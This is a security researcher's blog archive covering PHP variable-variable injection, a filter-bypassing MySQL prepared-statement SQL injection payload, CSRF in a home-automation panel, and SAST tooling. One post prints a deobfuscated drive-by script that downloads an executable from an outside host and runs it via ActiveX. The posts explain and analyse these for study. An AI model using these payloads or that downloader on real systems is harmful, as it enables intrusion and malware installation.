PHP, variable variables, oh my!
Romain | Tuesday, September 20 2011 - 18:50 UTC | Vulnerabilities
Romain | Tuesday, September 20 2011 - 18:50 UTC | Vulnerabilities
I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here.
The code I was looking at looks like this:
<?php
// Init the PHP array with some SQL code to start the query
$declareSQLArray = InitializedArray('stuff');
// Use a strong enough validation routine for do the input
// validation of POST variables
while(list($name, $value) = each($_POST)) {
if(!is_array($value))
$$name = StrongValidation($value);
else
$$name = $value;
}
// Do something with my variables and always do a proper
// validation when I use the data
// Eventually, build my SQL command, and send this to the DB
$sql_command = join(' ', $declareSQLArray);
mysql_query($sql_command);
?>
The code, even if horribly constructed, does not seem to show important
weaknesses, but the usual case of submitting a POST variable as an array, and
bypassing the StrongValidation. Then, in that case, it would have
failed every other validation routines in the code.
Even if experienced with PHP, you might not have encountered variable variables before. In short, this allows to dynamically declare named variables. Here is a simple example:
hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;' Hello World!
Here, the variable $foo gets declared, and assigned using PHP's
variable variables capabilities.
Getting back to our code example, I'm sure the reader will spot the issue,
and what an attacker can do to exploit such scenario to trigger, in that case,
a SQL injection. Since the variable $declareSQLArray is defined
and initialized before the POST variables lookup, it is possible to reassign it
using the variable variables. In that case, no validation is performed when we
submit an array, and this is exactly what we want to do!
To exploit the SQL injection, you only need to submit POST variables to
overwrite the $declareSQLArray, and add the content that we want
in it!
POST /code_example.php HTTP/1.1 Host: example.com ... declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever...
Job done! The resulting SQL query will start with the payload that was
submitted as part of $declareSQLArray. You've got your SQL injection.
Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code, and POST request after the answer is short: YES.
Imagine that you have an isadmin variable as part of the
session (which is an associative array). This variable would be set in a code
like this:
if ($user->isNotAdmin())
$_SESSION['isadmin'] = 0;
else
$_SESSION['isadmin'] = 1;
Exploiting the previous weakness of the code example, we are able to
overwrite the $_SESSION['isadmin'] content, only by supplying what
will be interpreted as an associative array by PHP:
POST /code_example.php HTTP/1.1 Host: example.com ... _SESSION%5Bisadmin%5D=1&whatever...
I'm sure you're thinking, as I do, that this is getting more interesting!
Anyways, this issue is not new at all, it is known as Dynamic Variable Evaluation (thanks to Steve Christey).
The interesting part of it is that DAST won't be able to detect it (or maybe
if you are lucky enough), and it is very hard for a SAST to deal with it
(actually, I doubt any SAST vendor who supports PHP handles this case, but it's
not impossible since they have all they need to solve the problem).
Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a super global for the remaining execution of the script, but cannot persist the data.
Romain | Wednesday, July 13 2011 - 22:29 UTC | Vulnerabilities
As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same types for XSS), is a simple, yet disturbing for juniors, black-list and few controls such as partial output encoding.
In the case of SQLi, I decided to blacklist the following keywords (as seen during an assessment): select, union, drop, delete, insert, and, or, where, update, if, not
On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-spaces.
The SQL commands is using a multiple queries aware driver (i.e., you can stack queries), and the injection context is fairly simple and we have something like this: SELECT username FROM users WHERE userid=<<HERE>>
Since this is an * exploitation* challenge, the goal is to extract the password of a given user from this database.
Now, every time that I write a challenge, I first come up with the application and I need to break it after to make sure that there is a solution (unless the challenge is derived from what I found already in some of my previous assessments).
Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about simply by using /**/ as a word separator, and we can use the hexadecimal representation of strings so that we make sure not to use single-quotes & co. Here is a quick summary with 2 similar queries:
The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL:
PREPARE st FROM 0x73656c656374202a2066726f6d207573657273; EXECUTE st; DEALLOCATE PREPARE st;
where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users' table (i.e., select * from users). The syntax of the PREPARE keyword is not flexible like any other string manipulation in MySQL, and does not allow strings with their hexadecimal representation.
The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following:
SET @v=0x73656c656374202a2066726f6d207573657273; PREPARE st FROM @v; EXECUTE st; DEALLOCATE PREPARE st;
Now, putting the pieces together, and adding this into the our original query, we get a payload similar like this:
9999||username=0xdeadbeef;SET/**/@s=0x73656c656374202a2066726f6d207573657273;PREPARE/**/ss/**/FROM/**/@s;EXECUTE/**/ss;DEALLOCATE/**/PREPARE/**/ss;#
This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement will return only one column, etc.
Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...
I just dig that image out; I made it for the release of the WASC Threat Classification 2.0
Romain | Sunday, January 10 2010 - 11:10 UTC | Discussion
In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools
1. You unfortunately list few types of SAST. Many of tools don't implement taint analysis -- if you go in the Ada/C/C++ world, you won't see much of taint based analysis, but other technologies such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers
2. As said on twitter, concerning the WASSEC, I don't believe it's important to have public evaluation of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that the tool should look for, we don't provide test cases so it's not nearly possible to claim that a tool effectively test for a given problem, e.g. difference between two tools:
Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS...
Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it.
3. NIST SATE is literally an exposition. NIST choose test cases (real open-source program that covers different type of functionalities and technologies) and ask tool makers to run their SAST on those programs. The goal isn't to compare the tool to claim that one is better than the other for a type of techno, but it's too see how tools (in general) performs, to see how many types of weaknesses the tools find and also what is the overlap of tool findings (which resulted in a very little amount of findings).
More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities:
Ultimately, every one of those elements are important and need to be tested, but again, the importance of those depend on who you are and how you want to use the SAST (from simple compliance type of scan to exhaustive security testing).
Just to tell you, NIST SAMATE (organizers of SATE) have been thinking a lot of those problem and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279
I've been working on a data warehouse project lately, in python, to support different kind of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version using SQLite database, to production, using MySQL or MSSQL databases.
SQLAlchemy is also one of these amazing ORM that support sharding -- It's not necessary to tell that it's very important when you develop a tool that will import, format, process and analyze gigabytes of data.
Also, working with a lot of data types, to register them into my ORM instance, and to persist them into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object. Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third party object. In most factories, we specify a type of object that we want to create: Give me an instance of a pizza with mushroom, tomatoes and ham.
The last point on asking for a particular type (or sub-type) of object was the main limitation for my use. In fact, most of my types are related in some ways, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of a code where I would list all different types of object my factory needs to create... Well, I wanted something more generic: a data driven factory.
The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be to be able to get an instance of a Margerita pizza when giving the certain ingredients (tomatoes, mozzarella and parmesan) or a Neapolitan if I add enchovies.
This type of factory, which depends only on the data to give in parameter, is possible in python by using the class inspection capabilities of the language. In fact, the implementation I propose requires to register each class to be constructed in the factory, constructor arguments (and defaults arguments) will be analyzed for a matcher later on, and to give as arguments the "type" of each data field (basically, the arguments); the factory will then get the appropriate object for you.
Side note: The fact that the factory doesn't return an instance of an object is for performances. In fact, I get the class from the factory, store it and loop through the instantiation with millions of data...
Example of use:
class Shape(object):
pass
class Circle(Shape):
def __init__(self, center, radius=RAD_MAX):
....
class DiskHole(Shape):
def __init__(self, center, radius, small_radius=RAD_SMALL):
....
factory = DDFactory()
factory.register(Shape)
factory.register(Circle)
factory.register(DiskHole)
print factory.get(['center', 'radius']) #> return 'Circle' ctor
print factory.get(['center', 'radius', 'small_radius']) #> return 'DiskHole' ctor
You can access this factory here: dd_factory.py
In the distributed code, I assume that each object to create has a
tablename class member that tells which database
table is the eventual target (which is my case using SQLAlchemy / declarative
objects). This is easy to change by replacing the factory register method by
something like this:
def register(self, cls):
if hasattr(cls, '__init__'):
s_cls = str(cls)
args, defaults_dict = DDFactory.defaults_values(cls)
if s_cls not in self.registrar:
self.registrar[s_cls] = {'class' : cls, 'args' : args, 'defaults' : defaults_dict}
Romain | Tuesday, June 30 2009 - 11:30 UTC | Information
The NIST SAMATE project conducted the first Static Analysis Tool
Exposition (SATE) in 2008 to advance research in static analysis tools that
find security defects in source code. The main goals of SATE were to enable
empirical research based on large test sets and to encourage improvement and
speed adoption of tools. The exposition was planned to be an annual
event.
SATE 2008 was one of my last project at NIST. I really enjoyed working on this project from the beginning, it was challenging especially because we had to create so many artifacts to make the tool reporting the weaknesses the same way, integrate them all together and provide ways for assessors to make meaningful reviews.
In a nutshell, we selected 6 different open-source programs (3 en C, 3 in Java) and made tool vendors running their tool on these test cases. Tool vendors were allowed to customize their tool if their tool provide such capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine the results all together and analyze: provide information on the correctness of the tool.
If you are interested, you can download the SATE data and the NIST SATE Special Publication.
Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black.
For more information, you can reach the SATE page at NIST.
Firefox 3.1beta has been released today, with the support of two HTML 5: audio and video.
Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers.
These are pretty incomplete documents and decided then, to create a mapping of the current WhatWG document and and the support of the browsers. This is possible because in the current document, they report the implementation status of the different items.
Anyway, here is a table, I assembled, containing the last information about the HTML5 implementations in the current browser engines.
I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate to, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again to Script Mapping during this summer...
EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30.
+ twitter is quite cool to follow/interact, feel free to follow me at @rgaucher
Romain | Saturday, February 21 2009 - 15:11 UTC | Information
Fortify just posted a nice blog post about the audit they did on several reference implementation that compete for being the next NIST SHA-3.
They do not release much information on their findings: only one is described. I would have really like to see how powerful was the analysis (if it was) to find these problems.
It could be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc. to do the same, and then, start another competition ;)
I'd really like to emphasize the conclusions in the Fortify's blog post:
Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two seperate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used.
The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation.
Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad on a usability point of view, but without them, spammers would easily add junk in your database. But it's even worse when the CAPTCHA software is not working properly...

Sure you won't get any spammers here... nor regular users.
Just to avoid confusion or misinterpretation, even if you refresh/clear cache/etc. you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon...
We see many different CAPTCHA on the web, some are good, some not. I do not know why people keep developing their own simplistic CAPTCHA when there is a good services line the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also adds audio version (way better for accessibility).
Hello Romain,
The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA’s National Clandestine Service seeks qualified applicants to serve our country’s mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge?
All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force.
For more information and to apply, visit: www.cia.gov
You can make a world of difference.
Com'on guys, I'm not even US citizen... So yeah, CIA is looking for security guys by spamming on linkedin groups. Anything wrong in that process?
Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (wall of shame of SSL certificates?)
So now, Google & co, fix your certificates :P
Romain | Tuesday, December 9 2008 - 14:05 UTC | Vulnerabilities
Today, a friend of mine was really proud to show me the Home Automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that was able to control the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights on the system.
Well, maybe I'm only seeing bad stuff around me, but... Déformation professionnelle we'll say! It was so easy to make it blinking with a simple script that I showed it to him. So well, every 5 seconds, it would change the state.
Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple google search, I found another site like my friend's. The URL that Google return is:
http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON
Which is basically turning on some device... :)
Also, not only this application has tons of CSRF, but also a nice stored XSS which let you do whatever you want with it! And btw, since the Google Robot reported this, it means that every time that it crawls the website (or at least, reaches that particular URL), it will set the device ON :)
Web security enters your house, f34rs!
Romain | Friday, December 5 2008 - 10:45 UTC
It's been such a long time since I haven't posted here. I've been quite busy with the new job at Cigital and all the implication.
Anyway, this morning, a collegue of mine show me a piece of javascript he used for create a request to another website (actually, this was just to do a javascript what I did in Python previously). This totally bugged me. He has been able to craft a request (using XHR) from a local file to a distant website... WTF with SOP? After some tests, it seems it's only working with IE7, but well, I didn't test with many browser, only with Firefox 3, Chrome, IE7.
So, I have no idea if this is known for a long time or not, but well, I haven't seen this before.
A simple POC is available here: xhr_SOP_ie7.html
Romain | Thursday, September 25 2008 - 09:01 UTC | Information
I know how tough and crucial it is to get participants to a survey, so that would be great if you guys could take this and spread it a little bit more...
Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values.
The URL is: http://theprivacyplace.org/currentsurvey
We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/).
Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina
On behalf of the research staff at ThePrivacyPlace.Org, thank you!
Every good things have an end... this is the time for me to leave NIST. So I will be a security consultant at Cigital, Inc..
I've been working at NIST for 2 years and a half as a Guest Researcher in the SAMATE Project. I originally came at NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", but working with flawed source code. This was very obscure to me (I guess like everybody computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners etc.
My first real security related work was about the Web Application Security Scanner Specification and then, design a way of testing the web apps scanners:
The goal of the 3 components based analysis is to really be able to understand what the tool is doing, if it didn't find a particular vulnerability, why?
One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we did many mistakes, but at least, we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects:
Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff and I'm really looking forward to see the results of the current study we are running on the function-wise weakness characterization.
But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.
Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine if there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project.
Today, I took time to finalize a bit more the Python version of Scalp. The version 0.4 can now be downloaded on the project web page.
This version includes a couple of features such as:
And then, with some other options that already existed in the previous versions,
the tool seems to approach a final version.
I won't add more into it since I want to keep it simple and quite fast (I may add optimization if I find some). Also, the C++ version is on its way and mostly done with same amount of options, the code is checkable using the google repository, but I still have to work on options and time-frame specification.
Scalp 0.4:
For the one that don't know Qt, this is a huge and mature framework for developing GUI & more on different platform (to read, multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD).
As, with Marcin, we wanted to have a look at some technologies that involved a browser etc. I decided to look at Qt and the almost-fresh WebKit integration.
The integration of WebKit in a framework like Qt, allows the developer to embed supposedly in a easy manner a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write its own plugin in order to interact with some specific content) in its application.
And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I know already Python and Qt, it was easy to me to start and be kinda effective. So, in few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, view the source and a simple encoding converter (click on the image to see the full screen-shot):
At this point, I was actually very excited, less than 500 lines of Python in order to create that... was kinda worth few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test.
My next and logic step was to extend the current tool in order to have the tamper-data like capabilities (eg. being able to hijack the HTTP request and then tampering the GET/POST data).
And here come the problems... it's apparently not possible to get the current request then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is use to set the proxies etc. but nothing... I think they just didn't open this possibility for some reason.
Oh well, I then stop developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then sending the content to the browser; this would be great in a webapps scanner, but for the use that I wanted with, that would create huge limitation for the user-interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt open their network management under the QWebView widget...
Fixed:
An update to let you know that I actually fixed the problem, it was really stupid from me, but I should really care when the method are virtual or not before overloading it or not :/ shame on me!
So now, I am able to have a firefox/tamper-data/firebug in one tool :)
Romain | Thursday, September 4 2008 - 12:15 UTC | Discussion
This is the question that is raising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but i'm just wondering how possible is it for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner.
Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First of, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc.
Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is not business like interference in the process...
People start thinking of how to prevent spam when they're building website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page...
For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address:
<script type="text/javascript">
//<![CDATA[
document.write('<a href="mailto:XXXX@qik.com"\
title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>
As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then trying to extract the email address (parsing). This is just obvious that a bot wouldn't bother with the CDATA tag or because this is embedded in a JavaScript code, if I would have to do a bot, nonetheless I would have a very lossy parsing in order to gather as much information as possible, but I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you have if this was a URL, the Google bots would get them...
So please, obfuscate just a bit this... some example can be found on fuckthespam.com
Romain | Sunday, August 10 2008 - 15:20 UTC | Discussion
When I first learned about source code metrics, I was amazed about people using the line of code for doing comparison with software. It was for me a lack of imagination.
At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract for each functions a couple of metrics:
At first the the line of code was implemented cause it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``source/sinks'' for studying input validation weaknesses later on...
Anyway, after running some statistics on the output results, I was amazed by observing that the Pearson correlation coefficient between McCabe and Line of Code was never less than 0.90 (which could be compare to 90% as a correlation rate) (but I have to say that there is huge limitations in the parsers we are using for extracting information, for instance, the C is not pre-processed etc.). This result is only valid for C test cases, actually, the average of observed correlation in Java test case is around 0.60...
Of course further statistical analysis will be necessary to conclude anything on this subject, but if we were unlucky with the test cases selection, this may have been a source of the problem, but I don't think we were. Actually, this seems quite logical to think that these metrics a related, the longer the code is, the more complex in term of tests, loops etc. it can be, there is indeed more chance that a longer code contains more cycles :)
Oh well, I'll keep writing about especially since I expect to get results pretty soon...
While working on the C++ version of scalp, I had to do massive simple transformations of a given text, ie. replacements of words by others.
Since the main way to do this (a loop which does a replacement at the time), is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such algorithm, it basically uses a non compact trie in order to have an efficient search of the current word.
The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to to replace the words: "ba", "me", "mp" in a text, the trie will be this following one:

The idea is then to iterate over all the characters in the text, and for each letter determines whether this is a possible word to replace or not (simply by looking if the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters are an actual word to replace or not (every time, the same methodology is used: look in the children at the current state of our iterator in the trie).
This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithm one.
I ran a little statistical comparison between two algorithms: mine and the
simple loop one. The test bed is quite simple and uses randomly generated text
which contains the words to replace with a certain density. In order to create
statistics, I made all the sizes varying and I aggregated the results
from the same dictionary size. So, for a given size of a dictionary
(let's say, 200 words to replace), a text has been generated with a density
that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be
words to replace) and finally, the size of the text vary from 25 to 200 words
(and words are randomly generated to be from a size 5 to 32).
As I said previously, the results from a same dictionary size has been
aggregated since I've seen practically that the result mainly depends on the
dictionnary size (it also obviously depends on the size of the text, but as
this is a constant for the 2 algorithm, I can compute the mean of the different
data to extract the average gain for a particular dictionary size).
Finally, here is the curve that shows the logarithm progress of the gain compared to the classical method):

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):
void str_replace(string& where, const string& what, const string& by) {
for (string::size_type i = where.find(what);
i != string::npos;
i = where.find(what, i + by.size()))
where.replace(i, what.size(), by);
}
and has been used M times (M is the size of the dictionary).A morning, I woke up, and all the websites using a download system didn't work anymore. Yeah this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore.
Such a big stress thinking that everything is broken at first, then after some time, realized that the problem is about the Content-Disposition header field which is dropped.
I wouldn't say that I would like to thank the admin that do no tell people about the modification... Anyway, I guess this is every time like that?
The Content-Disposition HTTP header field is used to explain to the browser how the data are presented. I basically use it in order to force a download system using such php script:
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Disposition: attachment; filename=".basename($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
?>
Now, if you cannot submit the Content-Disposition field, then the browser will download the file called "download.php". A quite simple solution, is to fool the browser by making the name of the reachable URI the same as the file it should download, using Mod_Rewrite.
RewriteEngine On RewriteBase /mydir RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1
And just a simple modification in the original script in order to detect the "file" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatically.
<?php
// download.php
// some checks on the $fname, variable to be sure
// it exists and is in the allowed directories...
if (isset($_GET['file_redir'])) {
$fname = $_GET['file_redir'];
// checks for good files (careful of directory traversal etc.)
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, pre-check=0");
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($fname));
header("Content-Description: File Transfer");
@readfile($fname);
exit;
}
else {
header("Location: /mydir/download/$fname");
exit;
}
?>
Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server will do extra work in order to go to the same state, the download of the file, but well, it does the job to fool the browser...
I started a project some time ago in order to parse some apache log file, to detect some attacks etc. The attack recognition is based on the PHP-IDS filters.
The first release version is written in Python http://code.google.com/p/apache-scalp/downloads/list but I started (well, almost finished) a faster multi-threaded/C++ version in order to be able to handle bigger log files.
The main project page is reachable here: http://code.google.com/p/apache-scalp
Scalp the apache log! - http://code.google.com/p/apache-scalp
usage: ./scalp.py [--log|-l log_file] [--filters|-f filter_file]
[--period time-frame] [OPTIONS] [--attack a1,a2,..,an]
--log |-l: the apache log file './access_log' by default
--filters |-f: the filter file './default_filter.xml' by default
--exhaustive|-e: will report all type of attacks detected and not stop
at the first found
--period |-p: the period must be specified in the same format as in
the Apache logs using * as wild-card
ex: 04/Apr/2008:15:45;*/Mai/2008
if not specified at the end, the max or min are taken
--html |-h: generate an HTML output
--xml |-x: generate an XML output
--text |-t: generate a simple text output (default)
--except |-c: generate a file that contains the non examined logs due
to the main regular expression; ill-formed Apache log etc.
--attack |-a: specify the list of attacks to look for
list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
the list of attacks should not contains spaces and be comma
separated
ex: xss,sqli,lfi,ref
It has been some time since I haven't post on my blog... well, I've been
busy especially with the end of SATE, and oh well! had vacation
:)
Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from this. I am then gonna talk about a tool I wrote in order to probe if a reported weakness is a false-positive: this is the Automated Evaluation.
The main idea of the Automated Evaluation, is to get some information on the source code and, under some assumptions, try to make a conclusion on the correctness of the piece of code. Behind all the reasoning from that particular tool, my approach had to be radically different than a classical SCA otherwise this would have been like creating a new SCA and this would have been obviously useless. The context of this automated evaluation is limited to the buffer overflows and this can only work for proving false-positive only!
So basically, I am reading the source code from the reported sink to the possibles sources and grabbing the actions that possibly affect the variable which have a role in the code.
These actions are like:
Then, once these actions are detected, the tool increments a global score of false-positiveness to this reported weakness. We then only have to set a threshold in order to know what correctness we want to have; this is really tied to the source code and how the program is developed.
Even though this evaluation method is not perfect, this was adapted to the C test cases we had in SATE 2008 since the global code quality was good. We can even say that the software were well written; it was then okay to make some assumption on the code such as:
Also, the tool itself needs some information on the source code such since it uses regular expression to match the "actions"...
Here we are for a quick explanation and here are the slides: SAW: Automated
Evaluation of SCA output
I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack".
Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this:
function myCreateOB(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} }
return(r);
}
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
var e = s.Environment("Process");
var xml = null;
var url = 'http://ad.ox88.info/bbs.jpg';
var bin = e.Item("TEMP") + "svchost.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}
function mywoewd() {
var i = 0;
var ss11='{7F5B7F';
var ss12='63-F06';
var ss13='F-4331-8A';
var ss14='26-339E0'
var ss15='3C0AE3D}';
var ss1=ss11+ss12+ss13+ss14+ss15
var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";
var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
if (b) {
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
}
As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)
Romain | Friday, May 16 2008 - 14:43 UTC | Discussion
If like me you are interested in code quality and some general conclusion that one can draw based on code quality studies, I really recommend to read this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering
